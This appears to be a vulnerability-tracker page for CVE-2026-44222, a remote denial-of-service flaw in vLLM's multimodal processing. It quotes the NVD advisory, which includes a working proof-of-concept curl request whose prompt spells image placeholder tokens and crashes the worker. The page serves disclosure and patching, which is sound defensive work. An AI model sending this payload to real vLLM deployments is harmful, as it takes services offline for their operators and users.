## Summary This report explains a Token Injection vulnerability in vLLM’s multimodal processing. Unauthenticated, text-only prompts that spell special tokens are interpreted as control. Image and video placeholder sequences supplied without matching data cause vLLM to index into empty grids during...
Full CISO analysis pending enrichment.
Affected Systems
| Package | Ecosystem | Vulnerable Range | Patched |
|---|---|---|---|
| vllm | pip | >= 0.6.1, < 0.20.0 | 0.20.0 |
Do you use vllm? You're affected.
Severity & Risk
Attack Surface
Recommended Action
Patch available
Update vllm to version 0.20.0
Compliance Impact
Compliance analysis pending. Sign in for full compliance mapping when available.
Frequently Asked Questions
What is CVE-2026-44222?
vLLM Vulnerable to Remote DoS via Special-Token Placeholders
Is CVE-2026-44222 actively exploited?
No confirmed active exploitation of CVE-2026-44222 has been reported, but organizations should still patch proactively.
How to fix CVE-2026-44222?
Update to patched version: vllm 0.20.0.
What is the CVSS score for CVE-2026-44222?
CVE-2026-44222 has a CVSS v3.1 base score of 6.5 (MEDIUM).
Technical Details
NVD Description
## Summary This report explains a Token Injection vulnerability in vLLM’s multimodal processing. Unauthenticated, text-only prompts that spell special tokens are interpreted as control. Image and video placeholder sequences supplied without matching data cause vLLM to index into empty grids during input-position computation, raising an unhandled IndexError and terminating the worker or degrading availability. Multimodal paths that rely on `image_grid_thw`/`video_grid_thw` are affected. Severity: High (remote DoS). Reproduced on vLLM 0.10.0 with Qwen2.5-VL. ## Details - Affected component: multimodal input position computation. - File/functions (paths are indicative): - vllm/model_executor/layers/rotary_embedding.py - get_input_positions_tensor(...) - _vl_get_input_positions_tensor(...) - Failure mechanism: - The code counts detected vision tokens and then indexes video_grid_thw/image_grid_thw accordingly. - When user input carries placeholder tokens but no actual multimodal payload, these grids are empty. The code does not bounds-check before indexing. Representative snippet (context): ```python # vllm/model_executor/layers/rotary_embedding.py @classmethod def _vl_get_input_positions_tensor( cls, input_tokens, hf_config, image_grid_thw, video_grid_thw, ..., ): # detect video tokens video_nums = (vision_tokens == video_token_id).sum() # later in processing t, h, w = ( video_grid_thw[video_index][0], # IndexError if no video data video_grid_thw[video_index][1], video_grid_thw[video_index][2], ) ``` Abbreviated call path: ``` OpenAI API request → vllm.v1.engine.core: step/execute_model → vllm.v1.worker.gpu_model_runner: _update_states/execute_model → vllm.model_executor.layers.rotary_embedding: get_input_positions_tensor → _vl_get_input_positions_tensor → IndexError: list index out of range ``` ## PoC ### Environment - vLLM: 0.10.0 - Model: Qwen/Qwen2.5-VL-3B-Instruct - Launch server: ```bash python -m vllm.entrypoints.openai.api_server \ --model Qwen/Qwen2.5-VL-3B-Instruct \ --port 8000 ``` ### Request (text-only, no image/video data) ```bash cat > request.json <<'JSON' { "model": "Qwen/Qwen2.5-VL-3B-Instruct", "messages": [ { "role": "user", "content": [ { "type": "text", "text": "what's in picture <|vision_start|><|image_pad|><|vision_end|>" } ] } ] } JSON curl -s http://127.0.0.1:8000/v1/chat/completions \ -H 'Content-Type: application/json' \ --data @request.json ``` ### Observed result - HTTP 500; logs show IndexError: list index out of range from _vl_get_input_positions_tensor(...). - In some deployments, the worker exits and capacity remains reduced until manual restart. ## Impact - Type: Token Injection leading to Remote Denial of Service (unauthenticated). A single request can trigger the fault. - Scope: Any vLLM deployment that serves VLMs and accepts raw user text via OpenAI-compatible endpoints (self-hosted or proxied/managed fronts). - Effect: Request → unhandled exception in position computation → worker termination / service unavailability. ## Fixes * Changes associated with https://github.com/vllm-project/vllm/issues/32656 ## Credits Pengyu Ding (Infra Security, Ant Group) Ziteng Xu (Infra Security, Ant Group)
Weaknesses (CWE)
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H References
Timeline
Related Vulnerabilities
CVE-2024-9053 9.8 vllm: RCE via unsafe pickle deserialization in RPC server
Same package: vllm CVE-2026-25960 9.8 vllm: SSRF allows internal network access
Same package: vllm CVE-2025-47277 9.8 vLLM: RCE via exposed TCPStore in distributed inference
Same package: vllm CVE-2024-11041 9.8 vllm: RCE via unsafe pickle deserialization in MessageQueue
Same package: vllm CVE-2025-32444 9.8 vLLM: RCE via pickle deserialization on ZeroMQ
Same package: vllm
AI Threat Alert